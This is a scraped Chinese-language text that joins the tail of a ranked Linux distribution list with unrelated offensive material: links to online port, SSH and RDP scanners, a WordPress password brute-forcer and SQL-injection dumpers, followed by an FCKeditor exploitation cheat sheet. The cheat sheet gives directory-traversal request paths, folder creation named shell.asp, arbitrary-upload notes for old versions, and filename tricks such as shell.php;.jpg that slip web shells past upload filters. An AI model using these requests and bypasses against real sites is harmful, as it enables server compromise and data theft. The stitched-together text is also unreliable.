3 Granular 79
84 Ulteo 77
85 DARKSTAR 76
86 Nexenta 71
87 Wolvix 70
88 PC/OS 70
89 AUSTRUMI 70
90 Yoper 68
91 m0n0wall 68
92 Berry 68
93 BeleniX 68
94 Lunar 67
95 KateOS 67
96 IPCop 67
97 GeeXboX 67
98 BLAG 67
99 SaxenOS 66
100 Greenie 59
在线端口扫描:
scan.subhashdasyam/port-scanner.php
在线VNC扫描:
scan.subhashdasyam/dumper-with-login.php
在线SSH扫描:
scan.subhashdasyam/ssh-scanner.php
在线后台地址扫描:
scan.subhashdasyam/admin-page-finder.php
在线Wordpress管理员密码破解:
scan.subhashdasyam/
wordpress-bruter.php
在线LFI扫描:
scan.subhashdasyam/lfi-scanner.php
在线RDP扫描:
scan.subhashdasyam/remote-desktop-scanner.php
在线SQL注入数据Dumper:
scan.subhashdasyam/dumper.php
在线SQL注入数据dumper(支持login):
scan.subhashdasyam/dumper-with-login.php
1、查看编辑器版本
/fckeditor/editor/dialog/fck_about.html
FCKeditor/_whatsnew.html
2、爆绝对路径
FCKeditor/editor/dialog/fck_spellerpages/spellerpages/server-scripts /spellchecker.php(支持php的通杀)
/FCKeditor/editor/filemanager/browser/default/browser.html?type=Image&;connector=connectors/aspx/connector.aspx 2.5可突破
FCKeditor/editor/filemanager/browser/default/connectors/aspx/
connector.aspx?Command=GetFoldersAndFiles&;Type=File&;CurrentFolder=/shell.asp
3、遍历目录
/FCKeditor/editor/filemanager/browser/default/connectors/aspx/
connector.aspx?Command=GetFoldersAndFiles&;Type=Image&;CurrentFolder=../../
Version 2.4.1 测试通过
修改CurrentFolder 参数使用 ../../来进入不同的目录
/browser/default/
connectors/aspx/connector.aspx?Command=CreateFolder&;Type=Image&;CurrentFolder=../../..%
2F&;NewFolderName=shell.asp
根据返回的XML 信息可以查看网站所有的目录。
FCKeditor/editor/filemanager/browser/default/connectors/aspx/
connector.aspx?Comm
and=GetFoldersAndFiles&;Type=Image&;CurrentFolder=%2F
也可以直接浏览盘符:
JSP 版本:
FCKeditor/editor/filemanager/browser/default/connectors/jsp/connector?Command=GetFoldersAndFiles&;Type=&;CurrentFolder=%2F
4、jsp上传
/FCKeditor/editor/filemanager/browser/default/browser.html?Connector=connectors/jsp/connector
/FCKeditor/editor/filemanager/browser/default/browser.html?Type=Image&;Connector=connectors/jsp/connector.jsp
5、Version < =2.4.2 For php 在处理
PHP 上传的地方并未对Media 类型进行上传文件类型的控制,导致用户上传任意文件!将以下保存为html文件,修改action地址。
6、 FCKeditor 文件上传“.”变“_”下划线的绕过方法
很多时候上传的文件例如:shell.php.rar 或shell.php;.jpg 会变为shell_php;.jpg 这是新版FCK 的变化。试试上传1.asp;jpg
6.1:提交shell.php+空格绕过
不过空格只支持win 系统 *nix 是不支持的[shell.php 和shell.php+空格是2 个不同的文件 未测试。
6.2:继续上传同名文件可变为shell.php;(1).jpg 也可以新建一个文件夹,只检测了第一级的目录,如果跳到二级目录就不受限制。
7、 突破建立文件夹
editor/FCKeditor/editor/filemanager/connectors/asp/connector.asp?Command=CreateFolder&;Type=Image&;CurrentFolder=/qing.a